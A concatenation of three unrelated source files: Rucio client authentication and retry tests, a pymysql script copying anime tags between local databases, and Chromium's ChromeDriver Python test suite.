# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021
# - Simon Fayer <simon.fayer05@imperial.ac.uk>, 2021
from __future__ import print_function
import unittest
from datetime import datetime, timedelta
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
from http.server import SimpleHTTPRequestHandler
try:
from SocketServer import TCPServer as HTTPServer
except ImportError:
from http.server import HTTPServer
from os import remove
from threading import Thread
import pytest
from rucio.client.baseclient import BaseClient
from rucio.client.client import Client
from rucio.common.config import config_get, config_get_bool
from rucio.common.exception import CannotAuthenticate, ClientProtocolNotSupported, RucioException
from rucio.common.utils import get_tmp_dir
from rucio.tests.common import get_long_vo
class MockServer:
    """
    Context manager running a small HTTP server on a daemon thread, used as
    a mock endpoint when testing the client.
    """

    class Handler(SimpleHTTPRequestHandler):
        def send_code_and_message(self, code, headers, message):
            """
            Helper which wraps the quite-low-level BaseHTTPRequestHandler primitives and is used to send reponses.
            """
            self.send_response(code)
            self.send_header("Content-type", "text/plain")
            for header_name, header_value in headers.items():
                self.send_header(header_name, header_value)
            self.end_headers()
            self.wfile.write(message.encode())

    def __init__(self, request_handler_cls):
        # Port 0: let the OS choose a free port; base_url reads it back.
        self.server = HTTPServer(('localhost', 0), request_handler_cls)
        self.thread = Thread(target=self.server.serve_forever, daemon=True)

    def __enter__(self):
        self.thread.start()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Stop serve_forever, wait for the thread, then release the socket.
        self.server.shutdown()
        self.thread.join()
        self.server.server_close()

    @property
    def base_url(self):
        host, port = self.server.server_address
        return 'http://{}:{}'.format(host, port)
@pytest.mark.noparallel(reason='fails when run in parallel')
class TestBaseClient(unittest.TestCase):
    """Authentication and retry behaviour of the low-level BaseClient."""

    def setUp(self):
        """Load test credentials from config and drop any cached auth token."""
        if config_get_bool('common', 'multi_vo', raise_exception=False, default=False):
            self.vo = {'vo': get_long_vo()}
            try:
                remove(get_tmp_dir() + '/.rucio_root@%s/auth_token_root' % self.vo['vo'])
            except OSError as error:
                # errno 2 (ENOENT) just means no cached token existed.
                if error.args[0] != 2:
                    raise error
        else:
            self.vo = {}

        self.cacert = config_get('test', 'cacert')
        self.usercert = config_get('test', 'usercert')
        self.userkey = config_get('test', 'userkey')

        try:
            remove(get_tmp_dir() + '/.rucio_root/auth_token_root')
        except OSError as error:
            if error.args[0] != 2:
                raise error

    def testUserpass(self):
        """ CLIENTS (BASECLIENT): authenticate with userpass."""
        creds = {'username': 'ddmlab', 'password': 'secret'}
        BaseClient(account='root', ca_cert=self.cacert, auth_type='userpass', creds=creds, **self.vo)

    def testUserpassWrongCreds(self):
        """ CLIENTS (BASECLIENT): try to authenticate with wrong username."""
        creds = {'username': 'wrong', 'password': 'secret'}
        with pytest.raises(CannotAuthenticate):
            BaseClient(account='root', ca_cert=self.cacert, auth_type='userpass', creds=creds, **self.vo)

    def testUserpassNoCACert(self):
        """ CLIENTS (BASECLIENT): authenticate with userpass without ca cert."""
        creds = {'username': 'wrong', 'password': 'secret'}
        with pytest.raises(CannotAuthenticate):
            BaseClient(account='root', auth_type='userpass', creds=creds, **self.vo)

    def testx509(self):
        """ CLIENTS (BASECLIENT): authenticate with x509."""
        creds = {'client_cert': self.usercert,
                 'client_key': self.userkey}
        BaseClient(account='root', ca_cert=self.cacert, auth_type='x509', creds=creds, **self.vo)

    def testx509NonExistingCert(self):
        """ CLIENTS (BASECLIENT): authenticate with x509 with missing certificate."""
        creds = {'client_cert': '/opt/rucio/etc/web/notthere.crt'}
        with pytest.raises(CannotAuthenticate):
            BaseClient(account='root', ca_cert=self.cacert, auth_type='x509', creds=creds, **self.vo)

    def testClientProtocolNotSupported(self):
        """ CLIENTS (BASECLIENT): try to pass an host with a not supported protocol."""
        creds = {'username': 'ddmlab', 'password': 'secret'}
        with pytest.raises(ClientProtocolNotSupported):
            BaseClient(rucio_host='localhost', auth_host='junk://localhost', account='root', auth_type='userpass', creds=creds, **self.vo)

    def testRetryOn502AlwaysFail(self):
        """ CLIENTS (BASECLIENT): Ensure client retries on 502 error codes, but fails on repeated errors"""
        class AlwaysFailWith502(MockServer.Handler):
            def do_GET(self):
                self.send_code_and_message(502, {}, '')

        with MockServer(AlwaysFailWith502) as server:
            with pytest.raises(CannotAuthenticate):
                creds = {'username': 'ddmlab', 'password': 'secret'}
                BaseClient(rucio_host=server.base_url, auth_host=server.base_url, account='root', auth_type='userpass', creds=creds, **self.vo)
            with pytest.raises(RucioException):
                creds = {'client_cert': self.usercert,
                         'client_key': self.userkey}
                BaseClient(rucio_host=server.base_url, auth_host=server.base_url, account='root', ca_cert=self.cacert, auth_type='x509', creds=creds, **self.vo)

    def testRetryOn502SucceedsEventually(self):
        """ CLIENTS (BASECLIENT): Ensure client retries on 502 error codes"""
        invocations = []

        class FailTwiceWith502(MockServer.Handler):
            def do_GET(self, invocations=invocations):
                invocations.append(self.path)
                if len(invocations) <= 2:
                    self.send_code_and_message(502, {}, '')
                else:
                    self.send_code_and_message(200, {'x-rucio-auth-token': 'sometoken'}, '')

        # Bug fix: the original mixed datetime.utcnow() (start) with
        # datetime.now() (end). On any machine not running in UTC the
        # measured elapsed time is skewed by the local UTC offset, making
        # the assertion below either vacuous or impossible. Use the same
        # clock for both timestamps.
        start_time = datetime.now()
        with MockServer(FailTwiceWith502) as server:
            creds = {'username': 'ddmlab', 'password': 'secret'}
            del invocations[:]
            client = BaseClient(rucio_host=server.base_url, auth_host=server.base_url, account='root', auth_type='userpass', creds=creds, **self.vo)
            del invocations[:]
            client._send_request(server.base_url)  # noqa

        # The client did back-off multiple times before succeeding: 2 * 0.25s (authentication) + 2 * 0.25s (request) = 1s
        assert datetime.now() - start_time > timedelta(seconds=0.9)
class TestRucioClients(unittest.TestCase):
    """Exercise the high-level Rucio Client."""

    def setUp(self):
        """Resolve the VO to use and load the CA certificate path."""
        multi_vo = config_get_bool('common', 'multi_vo', raise_exception=False, default=False)
        self.vo = {'vo': get_long_vo()} if multi_vo else {}
        self.cacert = config_get('test', 'cacert')
        self.marker = '$> '

    def test_ping(self):
        """ PING (CLIENT): Ping Rucio """
        creds = {'username': 'ddmlab', 'password': 'secret'}
        client = Client(account='root', ca_cert=self.cacert, auth_type='userpass',
                        creds=creds, **self.vo)
        print(client.ping())
|
tagsyi.py
|
import time
import pymysql
import multiprocessing
from pymysql.cursors import DictCursor
from multiprocessing import Process, Pool
# Source database holding the scraped bangumi tag rows (bidscore.tags).
db1 = pymysql.connect("localhost", "root", "", "bidscore")
# Destination database that receives per-anime tags (miraihyoka.tags).
db2 = pymysql.connect("localhost", "root", "", "miraihyoka")
# DictCursor so result rows can be addressed by column name.
cursor_b = db1.cursor(DictCursor)
cursor_m = db2.cursor(DictCursor)
def getbangumiid(animate_id, bangumi_id, m):
    """Copy all tags of one bangumi entry into miraihyoka.tags.

    Args:
        animate_id: id of the anime in the destination table.
        bangumi_id: id selecting the source rows in bidscore.tags.
        m: running counter, used only for the progress printout.
    """
    # Parameterized query: the original concatenated bangumi_id straight
    # into the SQL string, which is an injection risk and breaks on any
    # non-numeric id.
    sql2 = "select * from bidscore.tags where id=%s"
    cursor_b.execute(sql2, (bangumi_id,))
    items_b = cursor_b.fetchall()
    for item_b in items_b:
        tag = item_b["tag"]
        sql1 = "insert into miraihyoka.tags(animate_id, tag) value (%s,%s)"
        args = (animate_id, tag)
        cursor_m.execute(sql1, args)
    # Commit once per bangumi entry rather than per row.
    db2.commit()
    print("-----------------已插入" + str(m) + "条-----------------")
if __name__ == '__main__':
    sql1 = "select * from animate"
    # Reconnect if the connection timed out while the script was idle.
    db2.ping(reconnect=True)
    cursor_m.execute(sql1)
    items_m = cursor_m.fetchall()
    nnn = 0  # progress counter forwarded to getbangumiid
    aa=Pool(30)
    for item_m in items_m:
        an = item_m["animate_id"]
        # NOTE(review): "bangumi_idid" looks like a typo for "bangumi_id" —
        # verify against the animate table schema.
        bid = item_m["bangumi_idid"]
        if bid is not None:
            nnn += 1
            # NOTE(review): Pool.apply blocks until each task completes, so
            # despite the 30-worker pool these run strictly serially;
            # apply_async would actually parallelize — confirm intent.
            aa.apply(getbangumiid, args=(an, bid, nnn))
            # p = Process(target=getbangumiid, args=(an, bid, nnn))
            # p.start()
|
chromedriver_tests.py
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for ChromeDriver.
If your test is testing a specific part of the WebDriver API, consider adding
it to the appropriate place in the WebDriver tree instead.
"""
import binascii
from distutils import archive_util
import hashlib
import httplib
import os
import platform
import signal
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import urllib
import urllib2
import urlparse
from chromedriver_factory import ChromeDriverFactory
from chromedriver_launcher import ChromeDriverLauncher
from chromedriver_test import ChromeDriverTest
import test_paths
import util
try:
import simplejson as json
except ImportError:
import json
from selenium.common.exceptions import NoSuchWindowException
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.remote.command import Command
from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.support.ui import WebDriverWait
def SkipIf(should_skip):
  """Decorator which allows skipping individual test cases.

  When |should_skip| is true the decorated test function is replaced by
  None (which the unittest loader ignores); otherwise the function is
  returned unchanged.
  """
  def _decorate(func):
    return None if should_skip else func
  return _decorate
class Request(urllib2.Request):
  """Extends urllib2.Request to support all HTTP request types."""

  def __init__(self, url, method=None, data=None):
    """Initialise a new HTTP request.

    Arguments:
      url: The full URL to send the request to.
      method: The HTTP request method to use; defaults to 'GET'.
      data: The data to send with the request as a string. Defaults to
          None and is ignored if |method| is not 'POST' or 'PUT'.
    """
    if method is None:
      # Mirror urllib2's convention: the presence of a body implies POST.
      method = 'POST' if data is not None else 'GET'
    elif method not in ('POST', 'PUT'):
      # Only POST and PUT carry a body.
      data = None
    self.method = method
    urllib2.Request.__init__(self, url, data=data)

  def get_method(self):
    """Returns the HTTP method used by this request."""
    return self.method
def SendRequest(url, method=None, data=None):
  """Sends a HTTP request to the WebDriver server.

  Return values and exceptions raised are the same as those of
  |urllib2.urlopen|.

  Arguments:
    url: The full URL to send the request to.
    method: The HTTP request method to use; defaults to 'GET'.
    data: The data to send with the request as a string. Defaults to
        None and is ignored if |method| is not 'POST' or 'PUT'.

  Returns:
    A file-like object.
  """
  req = Request(url, method=method, data=data)
  req.add_header('Accept', 'application/json')
  # An explicit redirect handler so 30x responses are followed.
  redirect_opener = urllib2.build_opener(urllib2.HTTPRedirectHandler())
  return redirect_opener.open(req)
class BasicTest(ChromeDriverTest):
  """Basic ChromeDriver tests."""

  def setUp(self):
    # Each test gets a private server instance so the URL/status checks
    # cannot interfere with other tests using the shared server.
    self._server2 = ChromeDriverLauncher(self.GetDriverPath()).Launch()

  def tearDown(self):
    self._server2.Kill()

  def testShouldReturn403WhenSentAnUnknownCommandURL(self):
    request_url = self._server2.GetUrl() + '/foo'
    try:
      SendRequest(request_url, method='GET')
      self.fail('Should have raised a urllib.HTTPError for returned 403')
    except urllib2.HTTPError, expected:
      self.assertEquals(403, expected.code)

  def testShouldReturnHTTP405WhenSendingANonPostToTheSessionURL(self):
    request_url = self._server2.GetUrl() + '/session'
    try:
      SendRequest(request_url, method='GET')
      self.fail('Should have raised a urllib.HTTPError for returned 405')
    except urllib2.HTTPError, expected:
      self.assertEquals(405, expected.code)
      # /session only accepts POST; the server must advertise that.
      self.assertEquals('POST', expected.hdrs['Allow'])

  def testShouldGetA404WhenAttemptingToDeleteAnUnknownSession(self):
    request_url = self._server2.GetUrl() + '/session/unkown_session_id'
    try:
      SendRequest(request_url, method='DELETE')
      self.fail('Should have raised a urllib.HTTPError for returned 404')
    except urllib2.HTTPError, expected:
      self.assertEquals(404, expected.code)

  def testShouldReturn204ForFaviconRequests(self):
    request_url = self._server2.GetUrl() + '/favicon.ico'
    # In python2.5, a 204 status code causes an exception.
    if sys.version_info[0:2] == (2, 5):
      try:
        SendRequest(request_url, method='GET')
        self.fail('Should have raised a urllib.HTTPError for returned 204')
      except urllib2.HTTPError, expected:
        self.assertEquals(204, expected.code)
    else:
      response = SendRequest(request_url, method='GET')
      try:
        self.assertEquals(204, response.code)
      finally:
        response.close()

  def testCreatingSessionShouldRedirectToCorrectURL(self):
    request_url = self._server2.GetUrl() + '/session'
    response = SendRequest(request_url, method='POST',
                           data='{"desiredCapabilities": {}}')
    self.assertEquals(200, response.code)
    self.session_url = response.geturl()  # TODO(jleyba): verify this URL?

    data = json.loads(response.read())
    self.assertTrue(isinstance(data, dict))
    self.assertEquals(0, data['status'])

    # A successful new-session request redirects to /session/<sessionId>.
    url_parts = urlparse.urlparse(self.session_url)[2].split('/')
    self.assertEquals(3, len(url_parts))
    self.assertEquals('', url_parts[0])
    self.assertEquals('session', url_parts[1])
    self.assertEquals(data['sessionId'], url_parts[2])
class WebserverTest(ChromeDriverTest):
  """Tests the built-in ChromeDriver webserver."""

  def testShouldNotServeFilesByDefault(self):
    # Without a root_path the server must refuse plain file requests.
    server = ChromeDriverLauncher(self.GetDriverPath()).Launch()
    try:
      SendRequest(server.GetUrl(), method='GET')
      self.fail('Should have raised a urllib.HTTPError for returned 403')
    except urllib2.HTTPError, expected:
      self.assertEquals(403, expected.code)
    finally:
      server.Kill()

  def testCanServeFiles(self):
    # With root_path set, the server serves files beneath that directory;
    # fetching this very test file must succeed.
    launcher = ChromeDriverLauncher(self.GetDriverPath(),
                                    root_path=os.path.dirname(__file__))
    server = launcher.Launch()
    request_url = server.GetUrl() + '/' + os.path.basename(__file__)
    SendRequest(request_url, method='GET')
    server.Kill()
class NativeInputTest(ChromeDriverTest):
  """Native input ChromeDriver tests."""

  # Capabilities requesting OS-level (native) input events.
  _CAPABILITIES = {'chrome.nativeEvents': True }

  def testCanStartWithNativeEvents(self):
    driver = self.GetNewDriver(NativeInputTest._CAPABILITIES)
    self.assertTrue(driver.capabilities['chrome.nativeEvents'])

  # Flaky on windows. See crbug.com/80295.
  def DISABLED_testSendKeysNative(self):
    driver = self.GetNewDriver(NativeInputTest._CAPABILITIES)
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    # Find the text input.
    q = driver.find_element_by_name('key_input_test')
    # Send some keys.
    q.send_keys('tokyo')
    self.assertEqual(q.text, 'tokyo')

  # Needs to run on a machine with an IME installed.
  def DISABLED_testSendKeysNativeProcessedByIME(self):
    driver = self.GetNewDriver(NativeInputTest._CAPABILITIES)
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    q = driver.find_element_by_name('key_input_test')
    # Send key combination to turn IME on.
    q.send_keys(Keys.F7)
    q.send_keys('toukyou')
    # Now turning it off.
    q.send_keys(Keys.F7)
    # Expected value is the UTF-8 byte sequence for the kanji the IME
    # should have produced from the romaji input.
    self.assertEqual(q.get_attribute('value'), "\xe6\x9d\xb1\xe4\xba\xac")
class DesiredCapabilitiesTest(ChromeDriverTest):
  """Tests for webdriver desired capabilities."""

  def testCustomSwitches(self):
    # Pass a custom command-line switch and confirm about:version echoes it.
    switches = ['enable-file-cookie']
    capabilities = {'chrome.switches': switches}
    driver = self.GetNewDriver(capabilities)
    driver.get('about:version')
    self.assertNotEqual(-1, driver.page_source.find('enable-file-cookie'))
    driver.quit()

  def testBinary(self):
    # Chrome can be launched from an explicitly-specified binary path.
    self.GetNewDriver({'chrome.binary': self.GetChromePath()})

  def testUserProfile(self):
    """Test starting WebDriver session with custom profile."""

    # Open a new session and save the user profile.
    profile_dir = tempfile.mkdtemp()
    capabilities = {'chrome.switches': ['--user-data-dir=' + profile_dir]}
    driver = self.GetNewDriver(capabilities)
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    # Create a cookie.
    cookie_dict = {}
    cookie_dict['name'] = 'test_user_profile'
    cookie_dict['value'] = 'chrome profile'
    cookie_dict['expiry'] = time.time() + 120
    driver.add_cookie(cookie_dict)
    driver.quit()

    # Zip the 'Default' profile directory and base64-encode it, which is
    # the wire format for the 'chrome.profile' capability.
    profile_zip = archive_util.make_archive(os.path.join(profile_dir,
                                                         'profile'),
                                            'zip',
                                            root_dir=profile_dir,
                                            base_dir='Default')
    f = open(profile_zip, 'rb')
    base64_user_profile = binascii.b2a_base64(f.read()).strip()
    f.close()
    os.remove(profile_zip)

    # Start new session with the saved user profile.
    capabilities = {'chrome.profile': base64_user_profile}
    driver = self.GetNewDriver(capabilities)
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    # The cookie written by the first session must survive in the profile.
    cookie_dict = driver.get_cookie('test_user_profile')
    self.assertNotEqual(cookie_dict, None)
    self.assertEqual(cookie_dict['value'], 'chrome profile')
    driver.quit()

  def testInstallExtensions(self):
    """Test starting web driver with multiple extensions."""
    extensions = ['ext_test_1.crx', 'ext_test_2.crx']
    base64_extensions = []
    for ext in extensions:
      # Extensions are shipped as base64-encoded .crx payloads.
      f = open(test_paths.GetTestDataPath(ext), 'rb')
      base64_ext = (binascii.b2a_base64(f.read()).strip())
      base64_extensions.append(base64_ext)
      f.close()
    capabilities = {'chrome.extensions': base64_extensions}
    driver = self.GetNewDriver(capabilities)
    extension_names = [x.get_name() for x in driver.get_installed_extensions()]
    self.assertEquals(2, len(extension_names))
    self.assertTrue('ExtTest1' in extension_names)
    self.assertTrue('ExtTest2' in extension_names)
    driver.quit()

  def testPrefs(self):
    """Test that chromedriver can set user preferences."""
    # Allow popups via profile preferences, then confirm window.open works.
    driver = self.GetNewDriver({
      'chrome.noWebsiteTestingDefaults': True,
      'chrome.prefs': {
        'profile.default_content_settings': {
          'popups': 1
        },
      }
    })
    driver.get(self.GetTestDataUrl() + '/empty.html')
    driver.execute_script('window.open("about:blank")')
    self.assertEquals(2, len(driver.window_handles))
class DetachProcessTest(ChromeDriverTest):
  """Tests the 'chrome.detach' capability (Chrome outliving the server)."""

  def setUp(self):
    self._server2 = ChromeDriverLauncher(self.GetDriverPath()).Launch()
    self._factory2 = ChromeDriverFactory(self._server2)

  def tearDown(self):
    self._server2.Kill()

  # TODO(kkania): Remove this when Chrome 15 is stable.
  # crbug.com/134982
  def DISABLED_testDetachProcess(self):
    # This is a weak test. Its purpose is to just make sure we can start
    # Chrome successfully in detached mode. There's not an easy way to know
    # if Chrome is shutting down due to the channel error when the client
    # disconnects.
    driver = self._factory2.GetNewDriver({'chrome.detach': True})
    driver.get('about:memory')
    # Read Chrome's own pid from the about:memory page.
    pid = int(driver.find_elements_by_xpath('//*[@jscontent="pid"]')[0].text)
    self._server2.Kill()
    try:
      util.Kill(pid)
    except OSError:
      self.fail('Chrome quit after detached chromedriver server was killed')
class CookieTest(ChromeDriverTest):
  """Cookie test for the json webdriver protocol"""

  def testAddCookie(self):
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    cookie_dict = None
    cookie_dict = driver.get_cookie("chromedriver_cookie_test")
    cookie_dict = {}
    cookie_dict["name"] = "chromedriver_cookie_test"
    cookie_dict["value"] = "this is a test"
    driver.add_cookie(cookie_dict)
    cookie_dict = driver.get_cookie("chromedriver_cookie_test")
    self.assertNotEqual(cookie_dict, None)
    self.assertEqual(cookie_dict["value"], "this is a test")

  def testDeleteCookie(self):
    driver = self.GetNewDriver()
    # NOTE(review): testAddCookie() calls GetNewDriver() itself, so the
    # driver above may be a different session than the one that set the
    # cookie — confirm whether GetNewDriver reuses the same browser here.
    self.testAddCookie();
    driver.delete_cookie("chromedriver_cookie_test")
    cookie_dict = driver.get_cookie("chromedriver_cookie_test")
    self.assertEqual(cookie_dict, None)
class ScreenshotTest(ChromeDriverTest):
  """Tests to verify screenshot retrieval"""

  # Test page that renders a solid red box sized via the query string.
  REDBOX = "automation_proxy_snapshot/set_size.html"

  def testScreenCaptureAgainstReference(self):
    # Create a red square of 2000x2000 pixels.
    url = util.GetFileURLForPath(test_paths.GetChromeTestDataPath(self.REDBOX))
    url += '?2000,2000'
    driver = self.GetNewDriver()
    driver.get(url)
    s = driver.get_screenshot_as_base64()
    h = hashlib.md5(s).hexdigest()
    # Compare the PNG created to the reference hash.
    self.assertEquals(h, '12c0ade27e3875da3d8866f52d2fa84f')

  # This test requires Flash and must be run on a VM or via remote desktop.
  # See crbug.com/96317.
  def testSnapshotWithWindowlessFlashAndTransparentOverlay(self):
    if not util.IsWin():
      return

    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/plugin_transparency_test.html')
    snapshot = driver.get_screenshot_as_base64()
    # Golden-image comparison via md5 of the base64 screenshot payload.
    self.assertEquals(hashlib.md5(snapshot).hexdigest(),
                      '72e5b8525e48758bae59997472f27f14')
class SessionTest(ChromeDriverTest):
  """Tests dealing with WebDriver sessions."""

  def testShouldBeGivenCapabilitiesWhenStartingASession(self):
    driver = self.GetNewDriver()
    capabilities = driver.capabilities

    self.assertEquals('chrome', capabilities['browserName'])
    self.assertTrue(capabilities['javascriptEnabled'])
    self.assertTrue(capabilities['takesScreenshot'])
    self.assertTrue(capabilities['cssSelectorsEnabled'])

    # Value depends on what version the server is starting.
    self.assertTrue('version' in capabilities)
    self.assertTrue(
        isinstance(capabilities['version'], unicode),
        'Expected a %s, but was %s' % (unicode,
                                       type(capabilities['version'])))

    # The reported platform must match the host OS.
    system = platform.system()
    if system == 'Linux':
      self.assertEquals('linux', capabilities['platform'].lower())
    elif system == 'Windows':
      self.assertEquals('windows', capabilities['platform'].lower())
    elif system == 'Darwin':
      self.assertEquals('mac', capabilities['platform'].lower())
    else:
      # No python on ChromeOS, so we won't have a platform value, but
      # the server will know and return the value accordingly.
      self.assertEquals('chromeos', capabilities['platform'].lower())

  def testSessionCreationDeletion(self):
    self.GetNewDriver().quit()

  # crbug.com/103396
  def DISABLED_testMultipleSessionCreationDeletion(self):
    for i in range(10):
      self.GetNewDriver().quit()

  def testSessionCommandsAfterSessionDeletionReturn404(self):
    driver = self.GetNewDriver()
    url = self.GetTestDataUrl()
    url += '/session/' + driver.session_id
    driver.quit()
    try:
      # Any session-scoped command after quit must 404.
      response = SendRequest(url, method='GET')
      self.fail('Should have thrown 404 exception')
    except urllib2.HTTPError, expected:
      self.assertEquals(404, expected.code)

  def testMultipleConcurrentSessions(self):
    drivers = []
    for i in range(10):
      drivers += [self.GetNewDriver()]
    for driver in drivers:
      driver.quit()
class ShutdownTest(ChromeDriverTest):
  """Tests that a chromedriver server shuts down cleanly, even when busy."""

  def setUp(self):
    super(ShutdownTest, self).setUp()
    # Private server/factory so killing it does not disturb other tests.
    self._custom_server = ChromeDriverLauncher(self.GetDriverPath()).Launch()
    self._custom_factory = ChromeDriverFactory(self._custom_server,
                                               self.GetChromePath())

  def tearDown(self):
    self._custom_server.Kill()
    super(ShutdownTest, self).tearDown()

  def testShutdownWithSession(self):
    driver = self._custom_factory.GetNewDriver()
    driver.get(self._custom_server.GetUrl() + '/status')
    driver.find_element_by_tag_name('body')
    self._custom_server.Kill()

  def testShutdownWithBusySession(self):
    """Kills the server while a request is blocked on /hang."""
    def _Hang(driver):
      """Waits for the process to quit and then notifies."""
      try:
        driver.get(self._custom_server.GetUrl() + '/hang')
      except httplib.BadStatusLine:
        # Expected: the connection is severed when the server dies.
        pass
    driver = self._custom_factory.GetNewDriver()
    wait_thread = threading.Thread(target=_Hang, args=(driver,))
    wait_thread.start()
    wait_thread.join(5)
    # Thread should still be blocked on the hanging request.
    self.assertTrue(wait_thread.isAlive())
    self._custom_server.Kill()
    wait_thread.join(10)
    # Killing the server must unblock the request.
    self.assertFalse(wait_thread.isAlive())
class MouseTest(ChromeDriverTest):
  """Mouse command tests for the json webdriver protocol"""

  def setUp(self):
    super(MouseTest, self).setUp()
    self._driver = self.GetNewDriver()

  def testCanClickTransparentElement(self):
    self._driver.get(self.GetTestDataUrl() + '/transparent.html')
    self._driver.find_element_by_tag_name('a').click()
    self.assertTrue(self._driver.execute_script('return window.success'))

  # crbug.com/136875
  def DISABLED_testClickElementThatNeedsContainerScrolling(self):
    self._driver.get(self.GetTestDataUrl() + '/test_page.html')
    self._driver.find_element_by_name('hidden_scroll').click()
    self.assertTrue(self._driver.execute_script('return window.success'))

  # crbug.com/136875
  def DISABLED_testClickElementThatNeedsIframeScrolling(self):
    self._driver.get(self.GetTestDataUrl() + '/test_page.html')
    self._driver.switch_to_frame('iframe')
    self._driver.find_element_by_name('hidden_scroll').click()
    self.assertTrue(self._driver.execute_script('return window.success'))

  def testClickElementThatNeedsPageScrolling(self):
    self._driver.get(self.GetTestDataUrl() + '/test_page.html')
    self._driver.find_element_by_name('far_away').click()
    self.assertTrue(self._driver.execute_script('return window.success'))

  # TODO(kkania): Move this test to the webdriver repo.
  def testClickDoesSelectOption(self):
    self._driver.get(self.GetTestDataUrl() + '/test_page.html')
    option = self._driver.find_element_by_name('option')
    self.assertFalse(option.is_selected())
    option.click()
    self.assertTrue(option.is_selected())

  def testClickDoesUseFirstClientRect(self):
    self._driver.get(self.GetTestDataUrl() + '/test_page.html')
    self._driver.find_element_by_name('wrapped').click()
    self.assertTrue(self._driver.execute_script('return window.success'))

  def testThrowErrorIfNotClickable(self):
    self._driver.get(self.GetTestDataUrl() + '/not_clickable.html')
    elem = self._driver.find_element_by_name('click')
    self.assertRaises(WebDriverException, elem.click)
# crbug.com/109698: when running in xvfb, 2 extra mouse moves are received.
# crbug.com/138125: fails if the mouse cursor is left over the page.
@SkipIf(True)
class MouseEventTest(ChromeDriverTest):
  """Tests for checking the correctness of mouse events."""

  def setUp(self):
    super(MouseEventTest, self).setUp()
    self._driver = self.GetNewDriver()
    # Hold ctrl+shift for the whole test; _CheckEvent expects both modifiers.
    ActionChains(self._driver).key_down([Keys.CONTROL, Keys.SHIFT]).perform()
    self._driver.get(self.GetTestDataUrl() + '/events.html')
    self._divs = self._driver.find_elements_by_tag_name('div')

  def _CheckEvent(self, event, event_type, mouse_button, x, y):
    """Checks the given event properties.

    This function expects the ctrl and shift keys to be pressed.
    """
    self.assertEquals(event_type, event['type'])
    self.assertEquals(mouse_button, event['button'])
    self.assertEquals(False, event['altKey'])
    self.assertEquals(True, event['ctrlKey'])
    self.assertEquals(True, event['shiftKey'])
    self.assertEquals(x, event['x'])
    self.assertEquals(y, event['y'])

  def _GetElementMiddle(self, elem):
    """Returns the (x, y) page coordinates of the element's center pixel."""
    x = elem.location['x']
    y = elem.location['y']
    # +1 before halving rounds up for odd-sized elements.
    return (x + (elem.size['width'] + 1) / 2, y + (elem.size['height'] + 1) / 2)

  def testMoveCommand(self):
    x = self._divs[0].location['x']
    y = self._divs[0].location['y']
    center_x, center_y = self._GetElementMiddle(self._divs[0])
    # Move to element.
    ActionChains(self._driver).move_to_element(self._divs[0]).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(1, len(events))
    self._CheckEvent(events[0], 'mousemove', 0, center_x, center_y)
    # Move by offset.
    ActionChains(self._driver).move_by_offset(1, 2).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(1, len(events))
    self._CheckEvent(events[0], 'mousemove', 0, center_x + 1, center_y + 2)
    # Move to element and offset.
    ActionChains(self._driver).move_to_element_with_offset(
        self._divs[0], 2, 1).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(1, len(events))
    self._CheckEvent(events[0], 'mousemove', 0, x + 2, y + 1)

  def testClickCommand(self):
    center_x, center_y = self._GetElementMiddle(self._divs[0])
    # Left click element.
    ActionChains(self._driver).click(self._divs[0]).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(3, len(events))
    self._CheckEvent(events[0], 'mousemove', 0, center_x, center_y)
    self._CheckEvent(events[1], 'mousedown', 0, center_x, center_y)
    self._CheckEvent(events[2], 'mouseup', 0, center_x, center_y)
    # Left click.
    ActionChains(self._driver).click(None).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(2, len(events))
    self._CheckEvent(events[0], 'mousedown', 0, center_x, center_y)
    self._CheckEvent(events[1], 'mouseup', 0, center_x, center_y)
    # Right click.
    ActionChains(self._driver).context_click(None).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(2, len(events))
    self._CheckEvent(events[0], 'mousedown', 2, center_x, center_y)
    self._CheckEvent(events[1], 'mouseup', 2, center_x, center_y)

  def testButtonDownUpCommand(self):
    center_x, center_y = self._GetElementMiddle(self._divs[0])
    center_x2, center_y2 = self._GetElementMiddle(self._divs[1])
    # Press and release element.
    ActionChains(self._driver).click_and_hold(self._divs[0]).release(
        self._divs[1]).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(4, len(events))
    self._CheckEvent(events[0], 'mousemove', 0, center_x, center_y)
    self._CheckEvent(events[1], 'mousedown', 0, center_x, center_y)
    self._CheckEvent(events[2], 'mousemove', 0, center_x2, center_y2)
    self._CheckEvent(events[3], 'mouseup', 0, center_x2, center_y2)
    # Press and release.
    ActionChains(self._driver).click_and_hold(None).release(None).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(2, len(events))
    self._CheckEvent(events[0], 'mousedown', 0, center_x2, center_y2)
    self._CheckEvent(events[1], 'mouseup', 0, center_x2, center_y2)

  def testDoubleClickCommand(self):
    center_x, center_y = self._GetElementMiddle(self._divs[0])
    # Double click element.
    ActionChains(self._driver).double_click(self._divs[0]).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(6, len(events))
    self._CheckEvent(events[5], 'dblclick', 0, center_x, center_y)
    # Double click.
    ActionChains(self._driver).double_click(None).perform()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(5, len(events))
    self._CheckEvent(events[4], 'dblclick', 0, center_x, center_y)

